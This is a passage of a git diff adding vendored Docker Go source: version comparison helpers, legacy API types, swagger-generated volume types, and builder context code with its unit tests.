is less than another +func LessThan(v, other string) bool { + return compare(v, other) == -1 +} + +// LessThanOrEqualTo checks if a version is less than or equal to another +func LessThanOrEqualTo(v, other string) bool { + return compare(v, other) <= 0 +} + +// GreaterThan checks if a version is greater than another +func GreaterThan(v, other string) bool { + return compare(v, other) == 1 +} + +// GreaterThanOrEqualTo checks if a version is greater than or equal to another +func GreaterThanOrEqualTo(v, other string) bool { + return compare(v, other) >= 0 +} + +// Equal checks if a version is equal to another +func Equal(v, other string) bool { + return compare(v, other) == 0 +} diff --git a/vendor/github.com/docker/docker/api/types/versions/compare_test.go b/vendor/github.com/docker/docker/api/types/versions/compare_test.go new file mode 100644 index 0000000000..c2b96869f7 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/versions/compare_test.go @@ -0,0 +1,26 @@ +package versions + +import ( + "testing" +) + +func assertVersion(t *testing.T, a, b string, result int) { + if r := compare(a, b); r != result { + t.Fatalf("Unexpected version comparison result. Found %d, expected %d", r, result) + } +} + +func TestCompareVersion(t *testing.T) { + assertVersion(t, "1.12", "1.12", 0) + assertVersion(t, "1.0.0", "1", 0) + assertVersion(t, "1", "1.0.0", 0) + assertVersion(t, "1.05.00.0156", "1.0.221.9289", 1) + assertVersion(t, "1", "1.0.1", -1) + assertVersion(t, "1.0.1", "1", 1) + assertVersion(t, "1.0.1", "1.0.2", -1) + assertVersion(t, "1.0.2", "1.0.3", -1) + assertVersion(t, "1.0.3", "1.1", -1) + assertVersion(t, "1.1", "1.1.1", -1) + assertVersion(t, "1.1.1", "1.1.2", -1) + assertVersion(t, "1.1.2", "1.2", -1) +} diff --git a/vendor/github.com/docker/docker/api/types/versions/v1p19/types.go b/vendor/github.com/docker/docker/api/types/versions/v1p19/types.go new file mode 100644 index 0000000000..dc13150545 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/versions/v1p19/types.go @@ -0,0 +1,35 @@ +// Package v1p19 provides specific API types for the API version 1, patch 19. +package v1p19 + +import ( + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/versions/v1p20" + "github.com/docker/go-connections/nat" +) + +// ContainerJSON is a backcompatibility struct for APIs prior to 1.20. +// Note this is not used by the Windows daemon. +type ContainerJSON struct { + *types.ContainerJSONBase + Volumes map[string]string + VolumesRW map[string]bool + Config *ContainerConfig + NetworkSettings *v1p20.NetworkSettings +} + +// ContainerConfig is a backcompatibility struct for APIs prior to 1.20. +type ContainerConfig struct { + *container.Config + + MacAddress string + NetworkDisabled bool + ExposedPorts map[nat.Port]struct{} + + // backward compatibility, they now live in HostConfig + VolumeDriver string + Memory int64 + MemorySwap int64 + CPUShares int64 `json:"CpuShares"` + CPUSet string `json:"Cpuset"` +} diff --git a/vendor/github.com/docker/docker/api/types/versions/v1p20/types.go b/vendor/github.com/docker/docker/api/types/versions/v1p20/types.go new file mode 100644 index 0000000000..94a06d7452 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/versions/v1p20/types.go @@ -0,0 +1,40 @@ +// Package v1p20 provides specific API types for the API version 1, patch 20. +package v1p20 + +import ( + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/go-connections/nat" +) + +// ContainerJSON is a backcompatibility struct for the API 1.20 +type ContainerJSON struct { + *types.ContainerJSONBase + Mounts []types.MountPoint + Config *ContainerConfig + NetworkSettings *NetworkSettings +} + +// ContainerConfig is a backcompatibility struct used in ContainerJSON for the API 1.20 +type ContainerConfig struct { + *container.Config + + MacAddress string + NetworkDisabled bool + ExposedPorts map[nat.Port]struct{} + + // backward compatibility, they now live in HostConfig + VolumeDriver string +} + +// StatsJSON is a backcompatibility struct used in Stats for APIs prior to 1.21 +type StatsJSON struct { + types.Stats + Network types.NetworkStats `json:"network,omitempty"` +} + +// NetworkSettings is a backward compatible struct for APIs prior to 1.21 +type NetworkSettings struct { + types.NetworkSettingsBase + types.DefaultNetworkSettings +} diff --git a/vendor/github.com/docker/docker/api/types/volume.go b/vendor/github.com/docker/docker/api/types/volume.go new file mode 100644 index 0000000000..da4f8ebd9c --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/volume.go @@ -0,0 +1,58 @@ +package types + +// This file was generated by the swagger tool. +// Editing this file might prove futile when you re-run the swagger generate command + +// Volume volume +// swagger:model Volume +type Volume struct { + + // Name of the volume driver used by the volume. + // Required: true + Driver string `json:"Driver"` + + // User-defined key/value metadata. + // Required: true + Labels map[string]string `json:"Labels"` + + // Mount path of the volume on the host. + // Required: true + Mountpoint string `json:"Mountpoint"` + + // Name of the volume. + // Required: true + Name string `json:"Name"` + + // The driver specific options used when creating the volume. + // Required: true + Options map[string]string `json:"Options"` + + // The level at which the volume exists. Either `global` for cluster-wide, or `local` for machine level. + // Required: true + Scope string `json:"Scope"` + + // Low-level details about the volume, provided by the volume driver. + // Details are returned as a map with key/value pairs: + // `{"key":"value","key2":"value2"}`. + // + // The `Status` field is optional, and is omitted if the volume driver + // does not support this feature. + // + Status map[string]interface{} `json:"Status,omitempty"` + + // usage data + UsageData *VolumeUsageData `json:"UsageData,omitempty"` +} + +// VolumeUsageData volume usage data +// swagger:model VolumeUsageData +type VolumeUsageData struct { + + // The number of containers referencing this volume. + // Required: true + RefCount int64 `json:"RefCount"` + + // The disk space used by the volume (local driver only) + // Required: true + Size int64 `json:"Size"` +} diff --git a/vendor/github.com/docker/docker/api/types/volume/volumes_create.go b/vendor/github.com/docker/docker/api/types/volume/volumes_create.go new file mode 100644 index 0000000000..679c16006f --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/volume/volumes_create.go @@ -0,0 +1,29 @@ +package volume + +// ---------------------------------------------------------------------------- +// DO NOT EDIT THIS FILE +// This file was generated by `swagger generate operation` +// +// See hack/swagger-gen.sh +// ---------------------------------------------------------------------------- + +// VolumesCreateBody volumes create body +// swagger:model VolumesCreateBody +type VolumesCreateBody struct { + + // Name of the volume driver to use. + // Required: true + Driver string `json:"Driver"` + + // A mapping of driver options and values. These options are passed directly to the driver and are driver specific. + // Required: true + DriverOpts map[string]string `json:"DriverOpts"` + + // User-defined key/value metadata. + // Required: true + Labels map[string]string `json:"Labels"` + + // The new volume's name. If not specified, Docker generates a name. + // Required: true + Name string `json:"Name"` +} diff --git a/vendor/github.com/docker/docker/api/types/volume/volumes_list.go b/vendor/github.com/docker/docker/api/types/volume/volumes_list.go new file mode 100644 index 0000000000..7770bcb8fc --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/volume/volumes_list.go @@ -0,0 +1,23 @@ +package volume + +// ---------------------------------------------------------------------------- +// DO NOT EDIT THIS FILE +// This file was generated by `swagger generate operation` +// +// See hack/swagger-gen.sh +// ---------------------------------------------------------------------------- + +import "github.com/docker/docker/api/types" + +// VolumesListOKBody volumes list o k body +// swagger:model VolumesListOKBody +type VolumesListOKBody struct { + + // List of volumes + // Required: true + Volumes []*types.Volume `json:"Volumes"` + + // Warnings that occurred when fetching the list of volumes + // Required: true + Warnings []string `json:"Warnings"` +} diff --git a/vendor/github.com/docker/docker/builder/builder.go b/vendor/github.com/docker/docker/builder/builder.go new file mode 100644 index 0000000000..ced19e81e6 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/builder.go @@ -0,0 +1,169 @@ +// Package builder defines interfaces for any Docker builder to implement. +// +// Historically, only server-side Dockerfile interpreters existed. +// This package allows for other implementations of Docker builders. +package builder + +import ( + "io" + "os" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/image" + "github.com/docker/docker/reference" + "golang.org/x/net/context" +) + +const ( + // DefaultDockerfileName is the Default filename with Docker commands, read by docker build + DefaultDockerfileName string = "Dockerfile" +) + +// Context represents a file system tree. +type Context interface { + // Close allows to signal that the filesystem tree won't be used anymore. + // For Context implementations using a temporary directory, it is recommended to + // delete the temporary directory in Close(). + Close() error + // Stat returns an entry corresponding to path if any. + // It is recommended to return an error if path was not found. + // If path is a symlink it also returns the path to the target file. + Stat(path string) (string, FileInfo, error) + // Open opens path from the context and returns a readable stream of it. + Open(path string) (io.ReadCloser, error) + // Walk walks the tree of the context with the function passed to it. + Walk(root string, walkFn WalkFunc) error +} + +// WalkFunc is the type of the function called for each file or directory visited by Context.Walk(). +type WalkFunc func(path string, fi FileInfo, err error) error + +// ModifiableContext represents a modifiable Context. +// TODO: remove this interface once we can get rid of Remove() +type ModifiableContext interface { + Context + // Remove deletes the entry specified by `path`. + // It is usual for directory entries to delete all its subentries. + Remove(path string) error +} + +// FileInfo extends os.FileInfo to allow retrieving an absolute path to the file. +// TODO: remove this interface once pkg/archive exposes a walk function that Context can use. +type FileInfo interface { + os.FileInfo + Path() string +} + +// PathFileInfo is a convenience struct that implements the FileInfo interface. +type PathFileInfo struct { + os.FileInfo + // FilePath holds the absolute path to the file. + FilePath string + // Name holds the basename for the file. + FileName string +} + +// Path returns the absolute path to the file. +func (fi PathFileInfo) Path() string { + return fi.FilePath +} + +// Name returns the basename of the file. +func (fi PathFileInfo) Name() string { + if fi.FileName != "" { + return fi.FileName + } + return fi.FileInfo.Name() +} + +// Hashed defines an extra method intended for implementations of os.FileInfo. +type Hashed interface { + // Hash returns the hash of a file. + Hash() string + SetHash(string) +} + +// HashedFileInfo is a convenient struct that augments FileInfo with a field. +type HashedFileInfo struct { + FileInfo + // FileHash represents the hash of a file. + FileHash string +} + +// Hash returns the hash of a file. +func (fi HashedFileInfo) Hash() string { + return fi.FileHash +} + +// SetHash sets the hash of a file. +func (fi *HashedFileInfo) SetHash(h string) { + fi.FileHash = h +} + +// Backend abstracts calls to a Docker Daemon. +type Backend interface { + // TODO: use digest reference instead of name + + // GetImageOnBuild looks up a Docker image referenced by `name`. + GetImageOnBuild(name string) (Image, error) + // TagImage tags an image with newTag + TagImageWithReference(image.ID, reference.Named) error + // PullOnBuild tells Docker to pull image referenced by `name`. + PullOnBuild(ctx context.Context, name string, authConfigs map[string]types.AuthConfig, output io.Writer) (Image, error) + // ContainerAttachRaw attaches to container. + ContainerAttachRaw(cID string, stdin io.ReadCloser, stdout, stderr io.Writer, stream bool) error + // ContainerCreate creates a new Docker container and returns potential warnings + ContainerCreate(config types.ContainerCreateConfig) (container.ContainerCreateCreatedBody, error) + // ContainerRm removes a container specified by `id`. + ContainerRm(name string, config *types.ContainerRmConfig) error + // Commit creates a new Docker image from an existing Docker container. + Commit(string, *backend.ContainerCommitConfig) (string, error) + // ContainerKill stops the container execution abruptly. + ContainerKill(containerID string, sig uint64) error + // ContainerStart starts a new container + ContainerStart(containerID string, hostConfig *container.HostConfig, checkpoint string, checkpointDir string) error + // ContainerWait stops processing until the given container is stopped. + ContainerWait(containerID string, timeout time.Duration) (int, error) + // ContainerUpdateCmdOnBuild updates container.Path and container.Args + ContainerUpdateCmdOnBuild(containerID string, cmd []string) error + // ContainerCreateWorkdir creates the workdir (currently only used on Windows) + ContainerCreateWorkdir(containerID string) error + + // ContainerCopy copies/extracts a source FileInfo to a destination path inside a container + // specified by a container object. + // TODO: make an Extract method instead of passing `decompress` + // TODO: do not pass a FileInfo, instead refactor the archive package to export a Walk function that can be used + // with Context.Walk + // ContainerCopy(name string, res string) (io.ReadCloser, error) + // TODO: use copyBackend api + CopyOnBuild(containerID string, destPath string, src FileInfo, decompress bool) error + + // HasExperimental checks if the backend supports experimental features + HasExperimental() bool + + // SquashImage squashes the fs layers from the provided image down to the specified `to` image + SquashImage(from string, to string) (string, error) +} + +// Image represents a Docker image used by the builder. +type Image interface { + ImageID() string + RunConfig() *container.Config +} + +// ImageCacheBuilder represents a generator for stateful image cache. +type ImageCacheBuilder interface { + // MakeImageCache creates a stateful image cache. + MakeImageCache(cacheFrom []string) ImageCache +} + +// ImageCache abstracts an image cache. +// (parent image, child runconfig) -> child image +type ImageCache interface { + // GetCachedImageOnBuild returns a reference to a cached image whose parent equals `parent` + // and runconfig equals `cfg`. A cache miss is expected to return an empty ID and a nil error. + GetCache(parentID string, cfg *container.Config) (imageID string, err error) +} diff --git a/vendor/github.com/docker/docker/builder/context.go b/vendor/github.com/docker/docker/builder/context.go new file mode 100644 index 0000000000..600f42319b --- /dev/null +++ b/vendor/github.com/docker/docker/builder/context.go @@ -0,0 +1,260 @@ +package builder + +import ( + "bufio" + "fmt" + "io" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "runtime" + "strings" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/fileutils" + "github.com/docker/docker/pkg/gitutils" + "github.com/docker/docker/pkg/httputils" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/pkg/streamformatter" +) + +// ValidateContextDirectory checks if all the contents of the directory +// can be read and returns an error if some files can't be read +// symlinks which point to non-existing files don't trigger an error +func ValidateContextDirectory(srcPath string, excludes []string) error { + contextRoot, err := getContextRoot(srcPath) + if err != nil { + return err + } + return filepath.Walk(contextRoot, func(filePath string, f os.FileInfo, err error) error { + if err != nil { + if os.IsPermission(err) { + return fmt.Errorf("can't stat '%s'", filePath) + } + if os.IsNotExist(err) { + return nil + } + return err + } + + // skip this directory/file if it's not in the path, it won't get added to the context + if relFilePath, err := filepath.Rel(contextRoot, filePath); err != nil { + return err + } else if skip, err := fileutils.Matches(relFilePath, excludes); err != nil { + return err + } else if skip { + if f.IsDir() { + return filepath.SkipDir + } + return nil + } + + // skip checking if symlinks point to non-existing files, such symlinks can be useful + // also skip named pipes, because they hanging on open + if f.Mode()&(os.ModeSymlink|os.ModeNamedPipe) != 0 { + return nil + } + + if !f.IsDir() { + currentFile, err := os.Open(filePath) + if err != nil && os.IsPermission(err) { + return fmt.Errorf("no permission to read from '%s'", filePath) + } + currentFile.Close() + } + return nil + }) +} + +// GetContextFromReader will read the contents of the given reader as either a +// Dockerfile or tar archive. Returns a tar archive used as a context and a +// path to the Dockerfile inside the tar. +func GetContextFromReader(r io.ReadCloser, dockerfileName string) (out io.ReadCloser, relDockerfile string, err error) { + buf := bufio.NewReader(r) + + magic, err := buf.Peek(archive.HeaderSize) + if err != nil && err != io.EOF { + return nil, "", fmt.Errorf("failed to peek context header from STDIN: %v", err) + } + + if archive.IsArchive(magic) { + return ioutils.NewReadCloserWrapper(buf, func() error { return r.Close() }), dockerfileName, nil + } + + // Input should be read as a Dockerfile. + tmpDir, err := ioutil.TempDir("", "docker-build-context-") + if err != nil { + return nil, "", fmt.Errorf("unbale to create temporary context directory: %v", err) + } + + f, err := os.Create(filepath.Join(tmpDir, DefaultDockerfileName)) + if err != nil { + return nil, "", err + } + _, err = io.Copy(f, buf) + if err != nil { + f.Close() + return nil, "", err + } + + if err := f.Close(); err != nil { + return nil, "", err + } + if err := r.Close(); err != nil { + return nil, "", err + } + + tar, err := archive.Tar(tmpDir, archive.Uncompressed) + if err != nil { + return nil, "", err + } + + return ioutils.NewReadCloserWrapper(tar, func() error { + err := tar.Close() + os.RemoveAll(tmpDir) + return err + }), DefaultDockerfileName, nil + +} + +// GetContextFromGitURL uses a Git URL as context for a `docker build`. The +// git repo is cloned into a temporary directory used as the context directory. +// Returns the absolute path to the temporary context directory, the relative +// path of the dockerfile in that context directory, and a non-nil error on +// success. +func GetContextFromGitURL(gitURL, dockerfileName string) (absContextDir, relDockerfile string, err error) { + if _, err := exec.LookPath("git"); err != nil { + return "", "", fmt.Errorf("unable to find 'git': %v", err) + } + if absContextDir, err = gitutils.Clone(gitURL); err != nil { + return "", "", fmt.Errorf("unable to 'git clone' to temporary context directory: %v", err) + } + + return getDockerfileRelPath(absContextDir, dockerfileName) +} + +// GetContextFromURL uses a remote URL as context for a `docker build`. The +// remote resource is downloaded as either a Dockerfile or a tar archive. +// Returns the tar archive used for the context and a path of the +// dockerfile inside the tar. +func GetContextFromURL(out io.Writer, remoteURL, dockerfileName string) (io.ReadCloser, string, error) { + response, err := httputils.Download(remoteURL) + if err != nil { + return nil, "", fmt.Errorf("unable to download remote context %s: %v", remoteURL, err) + } + progressOutput := streamformatter.NewStreamFormatter().NewProgressOutput(out, true) + + // Pass the response body through a progress reader. + progReader := progress.NewProgressReader(response.Body, progressOutput, response.ContentLength, "", fmt.Sprintf("Downloading build context from remote url: %s", remoteURL)) + + return GetContextFromReader(ioutils.NewReadCloserWrapper(progReader, func() error { return response.Body.Close() }), dockerfileName) +} + +// GetContextFromLocalDir uses the given local directory as context for a +// `docker build`. Returns the absolute path to the local context directory, +// the relative path of the dockerfile in that context directory, and a non-nil +// error on success. +func GetContextFromLocalDir(localDir, dockerfileName string) (absContextDir, relDockerfile string, err error) { + // When using a local context directory, when the Dockerfile is specified + // with the `-f/--file` option then it is considered relative to the + // current directory and not the context directory. + if dockerfileName != "" { + if dockerfileName, err = filepath.Abs(dockerfileName); err != nil { + return "", "", fmt.Errorf("unable to get absolute path to Dockerfile: %v", err) + } + } + + return getDockerfileRelPath(localDir, dockerfileName) +} + +// getDockerfileRelPath uses the given context directory for a `docker build` +// and returns the absolute path to the context directory, the relative path of +// the dockerfile in that context directory, and a non-nil error on success. +func getDockerfileRelPath(givenContextDir, givenDockerfile string) (absContextDir, relDockerfile string, err error) { + if absContextDir, err = filepath.Abs(givenContextDir); err != nil { + return "", "", fmt.Errorf("unable to get absolute context directory of given context directory %q: %v", givenContextDir, err) + } + + // The context dir might be a symbolic link, so follow it to the actual + // target directory. + // + // FIXME. We use isUNC (always false on non-Windows platforms) to workaround + // an issue in golang. On Windows, EvalSymLinks does not work on UNC file + // paths (those starting with \\). This hack means that when using links + // on UNC paths, they will not be followed. + if !isUNC(absContextDir) { + absContextDir, err = filepath.EvalSymlinks(absContextDir) + if err != nil { + return "", "", fmt.Errorf("unable to evaluate symlinks in context path: %v", err) + } + } + + stat, err := os.Lstat(absContextDir) + if err != nil { + return "", "", fmt.Errorf("unable to stat context directory %q: %v", absContextDir, err) + } + + if !stat.IsDir() { + return "", "", fmt.Errorf("context must be a directory: %s", absContextDir) + } + + absDockerfile := givenDockerfile + if absDockerfile == "" { + // No -f/--file was specified so use the default relative to the + // context directory. + absDockerfile = filepath.Join(absContextDir, DefaultDockerfileName) + + // Just to be nice ;-) look for 'dockerfile' too but only + // use it if we found it, otherwise ignore this check + if _, err = os.Lstat(absDockerfile); os.IsNotExist(err) { + altPath := filepath.Join(absContextDir, strings.ToLower(DefaultDockerfileName)) + if _, err = os.Lstat(altPath); err == nil { + absDockerfile = altPath + } + } + } + + // If not already an absolute path, the Dockerfile path should be joined to + // the base directory. + if !filepath.IsAbs(absDockerfile) { + absDockerfile = filepath.Join(absContextDir, absDockerfile) + } + + // Evaluate symlinks in the path to the Dockerfile too. + // + // FIXME. We use isUNC (always false on non-Windows platforms) to workaround + // an issue in golang. On Windows, EvalSymLinks does not work on UNC file + // paths (those starting with \\). This hack means that when using links + // on UNC paths, they will not be followed. + if !isUNC(absDockerfile) { + absDockerfile, err = filepath.EvalSymlinks(absDockerfile) + if err != nil { + return "", "", fmt.Errorf("unable to evaluate symlinks in Dockerfile path: %v", err) + } + } + + if _, err := os.Lstat(absDockerfile); err != nil { + if os.IsNotExist(err) { + return "", "", fmt.Errorf("Cannot locate Dockerfile: %q", absDockerfile) + } + return "", "", fmt.Errorf("unable to stat Dockerfile: %v", err) + } + + if relDockerfile, err = filepath.Rel(absContextDir, absDockerfile); err != nil { + return "", "", fmt.Errorf("unable to get relative Dockerfile path: %v", err) + } + + if strings.HasPrefix(relDockerfile, ".."+string(filepath.Separator)) { + return "", "", fmt.Errorf("The Dockerfile (%s) must be within the build context (%s)", givenDockerfile, givenContextDir) + } + + return absContextDir, relDockerfile, nil +} + +// isUNC returns true if the path is UNC (one starting \\). It always returns +// false on Linux. +func isUNC(path string) bool { + return runtime.GOOS == "windows" && strings.HasPrefix(path, `\\`) +} diff --git a/vendor/github.com/docker/docker/builder/context_test.go b/vendor/github.com/docker/docker/builder/context_test.go new file mode 100644 index 0000000000..27d29d79f4 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/context_test.go @@ -0,0 +1,307 @@ +package builder + +import ( + "archive/tar" + "bytes" + "io" + "io/ioutil" + "path/filepath" + "runtime" + "strings" + "testing" + + "github.com/docker/docker/pkg/archive" +) + +var prepareEmpty = func(t *testing.T) (string, func()) { + return "", func() {} +} + +var prepareNoFiles = func(t *testing.T) (string, func()) { + return createTestTempDir(t, "", "builder-context-test") +} + +var prepareOneFile = func(t *testing.T) (string, func()) { + contextDir, cleanup := createTestTempDir(t, "", "builder-context-test") + createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777) + return contextDir, cleanup +} + +func testValidateContextDirectory(t *testing.T, prepare func(t *testing.T) (string, func()), excludes []string) { + contextDir, cleanup := prepare(t) + defer cleanup() + + err := ValidateContextDirectory(contextDir, excludes) + + if err != nil { + t.Fatalf("Error should be nil, got: %s", err) + } +} + +func TestGetContextFromLocalDirNoDockerfile(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-context-test") + defer cleanup() + + absContextDir, relDockerfile, err := GetContextFromLocalDir(contextDir, "") + + if err == nil { + t.Fatalf("Error should not be nil") + } + + if absContextDir != "" { + t.Fatalf("Absolute directory path should be empty, got: %s", absContextDir) + } + + if relDockerfile != "" { + t.Fatalf("Relative path to Dockerfile should be empty, got: %s", relDockerfile) + } +} + +func TestGetContextFromLocalDirNotExistingDir(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-context-test") + defer cleanup() + + fakePath := filepath.Join(contextDir, "fake") + + absContextDir, relDockerfile, err := GetContextFromLocalDir(fakePath, "") + + if err == nil { + t.Fatalf("Error should not be nil") + } + + if absContextDir != "" { + t.Fatalf("Absolute directory path should be empty, got: %s", absContextDir) + } + + if relDockerfile != "" { + t.Fatalf("Relative path to Dockerfile should be empty, got: %s", relDockerfile) + } +} + +func TestGetContextFromLocalDirNotExistingDockerfile(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-context-test") + defer cleanup() + + fakePath := filepath.Join(contextDir, "fake") + + absContextDir, relDockerfile, err := GetContextFromLocalDir(contextDir, fakePath) + + if err == nil { + t.Fatalf("Error should not be nil") + } + + if absContextDir != "" { + t.Fatalf("Absolute directory path should be empty, got: %s", absContextDir) + } + + if relDockerfile != "" { + t.Fatalf("Relative path to Dockerfile should be empty, got: %s", relDockerfile) + } +} + +func TestGetContextFromLocalDirWithNoDirectory(t *testing.T) { + contextDir, dirCleanup := createTestTempDir(t, "", "builder-context-test") + defer dirCleanup() + + createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777) + + chdirCleanup := chdir(t, contextDir) + defer chdirCleanup() + + absContextDir, relDockerfile, err := GetContextFromLocalDir(contextDir, "") + + if err != nil { + t.Fatalf("Error when getting context from local dir: %s", err) + } + + if absContextDir != contextDir { + t.Fatalf("Absolute directory path should be equal to %s, got: %s", contextDir, absContextDir) + } + + if relDockerfile != DefaultDockerfileName { + t.Fatalf("Relative path to dockerfile should be equal to %s, got: %s", DefaultDockerfileName, relDockerfile) + } +} + +func TestGetContextFromLocalDirWithDockerfile(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-context-test") + defer cleanup() + + createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777) + + absContextDir, relDockerfile, err := GetContextFromLocalDir(contextDir, "") + + if err != nil { + t.Fatalf("Error when getting context from local dir: %s", err) + } + + if absContextDir != contextDir { + t.Fatalf("Absolute directory path should be equal to %s, got: %s", contextDir, absContextDir) + } + + if relDockerfile != DefaultDockerfileName { + t.Fatalf("Relative path to dockerfile should be equal to %s, got: %s", DefaultDockerfileName, relDockerfile) + } +} + +func TestGetContextFromLocalDirLocalFile(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-context-test") + defer cleanup() + + createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777) + testFilename := createTestTempFile(t, contextDir, "tmpTest", "test", 0777) + + absContextDir, relDockerfile, err := GetContextFromLocalDir(testFilename, "") + + if err == nil { + t.Fatalf("Error should not be nil") + } + + if absContextDir != "" { + t.Fatalf("Absolute directory path should be empty, got: %s", absContextDir) + } + + if relDockerfile != "" { + t.Fatalf("Relative path to Dockerfile should be empty, got: %s", relDockerfile) + } +} + +func TestGetContextFromLocalDirWithCustomDockerfile(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-context-test") + defer cleanup() + + chdirCleanup := chdir(t, contextDir) + defer chdirCleanup() + + createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777) + + absContextDir, relDockerfile, err := GetContextFromLocalDir(contextDir, DefaultDockerfileName) + + if err != nil { + t.Fatalf("Error when getting context from local dir: %s", err) + } + + if absContextDir != contextDir { + t.Fatalf("Absolute directory path should be equal to %s, got: %s", contextDir, absContextDir) + } + + if relDockerfile != DefaultDockerfileName { + t.Fatalf("Relative path to dockerfile should be equal to %s, got: %s", DefaultDockerfileName, relDockerfile) + } + +} + +func TestGetContextFromReaderString(t *testing.T) { + tarArchive, relDockerfile, err := GetContextFromReader(ioutil.NopCloser(strings.NewReader(dockerfileContents)), "") + + if err != nil { + t.Fatalf("Error when executing GetContextFromReader: %s", err) + } + + tarReader := tar.NewReader(tarArchive) + + _, err = tarReader.Next() + + if err != nil { + t.Fatalf("Error when reading tar archive: %s", err) + } + + buff := new(bytes.Buffer) + buff.ReadFrom(tarReader) + contents := buff.String() + + _, err = tarReader.Next() + + if err != io.EOF { + t.Fatalf("Tar stream too long: %s", err) + } + + if err = tarArchive.Close(); err != nil { + t.Fatalf("Error when closing tar stream: %s", err) + } + + if dockerfileContents != contents { + t.Fatalf("Uncompressed tar archive does not equal: %s, got: %s", dockerfileContents, contents) + } + + if relDockerfile != DefaultDockerfileName { + t.Fatalf("Relative path not equals %s, got: %s", DefaultDockerfileName, relDockerfile) + } +} + +func TestGetContextFromReaderTar(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-context-test") + defer cleanup() + + createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777) + + tarStream, err := archive.Tar(contextDir, archive.Uncompressed) + + if err != nil { + t.Fatalf("Error when creating tar: %s", err) + } + + tarArchive, relDockerfile, err := GetContextFromReader(tarStream, DefaultDockerfileName) + + if err != nil { + t.Fatalf("Error when executing GetContextFromReader: %s", err) + } + + tarReader := tar.NewReader(tarArchive) + + header, err := tarReader.Next() + + if err != nil { + t.Fatalf("Error when reading tar archive: %s", err) + } + + if header.Name != DefaultDockerfileName { + t.Fatalf("Dockerfile name should be: %s, got: %s", DefaultDockerfileName, header.Name) + } + + buff := new(bytes.Buffer) + buff.ReadFrom(tarReader) + contents := buff.String() + + _, err = tarReader.Next() + + if err != io.EOF { + t.Fatalf("Tar stream too long: %s", err) + } + + if err = tarArchive.Close(); err != nil { + t.Fatalf("Error when closing tar stream: %s", err) + } + + if dockerfileContents != contents { + t.Fatalf("Uncompressed tar archive does not equal: %s, got: %s", dockerfileContents, contents) + } + + if relDockerfile != DefaultDockerfileName { + t.Fatalf("Relative path not equals %s, got: %s", DefaultDockerfileName, relDockerfile) + } +} + +func TestValidateContextDirectoryEmptyContext(t *testing.T) { + // This isn't a valid test on Windows. See https://play.golang.org/p/RR6z6jxR81. + // The test will ultimately end up calling filepath.Abs(""). On Windows, + // golang will error. On Linux, golang will return /. Due to there being + // drive letters on Windows, this is probably the correct behaviour for + // Windows. + if runtime.GOOS == "windows" { + t.Skip("Invalid test on Windows") + } + testValidateContextDirectory(t, prepareEmpty, []string{}) +} + +func TestValidateContextDirectoryContextWithNoFiles(t *testing.T) { + testValidateContextDirectory(t, prepareNoFiles, []string{}) +} + +func TestValidateContextDirectoryWithOneFile(t *testing.T) { + testValidateContextDirectory(t, prepareOneFile, []string{}) +} + +func TestValidateContextDirectoryWithOneFileExcludes(t *testing.T) { + testValidateContextDirectory(t, prepareOneFile, []string{DefaultDockerfileName}) +} diff --git a/vendor/github.com/docker/docker/builder/context_unix.go b/vendor/github.com/docker/docker/builder/context_unix.go new file mode 100644 index 0000000000..d1f72e0573 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/context_unix.go @@ -0,0 +1,11 @@ +// +build !windows + +package builder + +import ( + "path/filepath" +) + +func getContextRoot(srcPath string) (string, error) { + return filepath.Join(srcPath, "."), nil +} diff --git a/vendor/github.com/docker/docker/builder/context_windows.go b/vendor/github.com/docker/docker/builder/context_windows.go new file mode 100644 index 0000000000..b8ba2ba231 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/context_windows.go @@ -0,0 +1,17 @@ +// +build windows + +package builder + +import ( + "path/filepath" + + "github.com/docker/docker/pkg/longpath" +) + +func getContextRoot(srcPath string) (string, error) { + cr, err := filepath.Abs(srcPath) + if err != nil { + return "", err + } + return longpath.AddPrefix(cr), nil +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/bflag.go b/vendor/github.com/docker/docker/builder/dockerfile/bflag.go new file mode 100644 index 0000000000..1e03693072 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/bflag.go @@ -0,0 +1,176 @@ +package dockerfile + +import ( + "fmt" + "strings" +) + +// FlagType is the type of the build flag +type FlagType int + +const ( + boolType FlagType = iota + stringType +) + +// BFlags contains all flags information for the builder +type BFlags struct { + Args []string // actual flags/args from cmd line + flags map[string]*Flag + used map[string]*Flag + Err error +} + +// Flag contains all information for a flag +type Flag struct { + bf *BFlags + name string + flagType FlagType + Value string +} + +// NewBFlags returns the new BFlags struct +func NewBFlags() *BFlags { + return &BFlags{ + flags: make(map[string]*Flag), + used: make(map[string]*Flag), + } +} + +// AddBool adds a bool flag to BFlags +// Note, any error will be generated when Parse() is called (see Parse). +func (bf *BFlags) 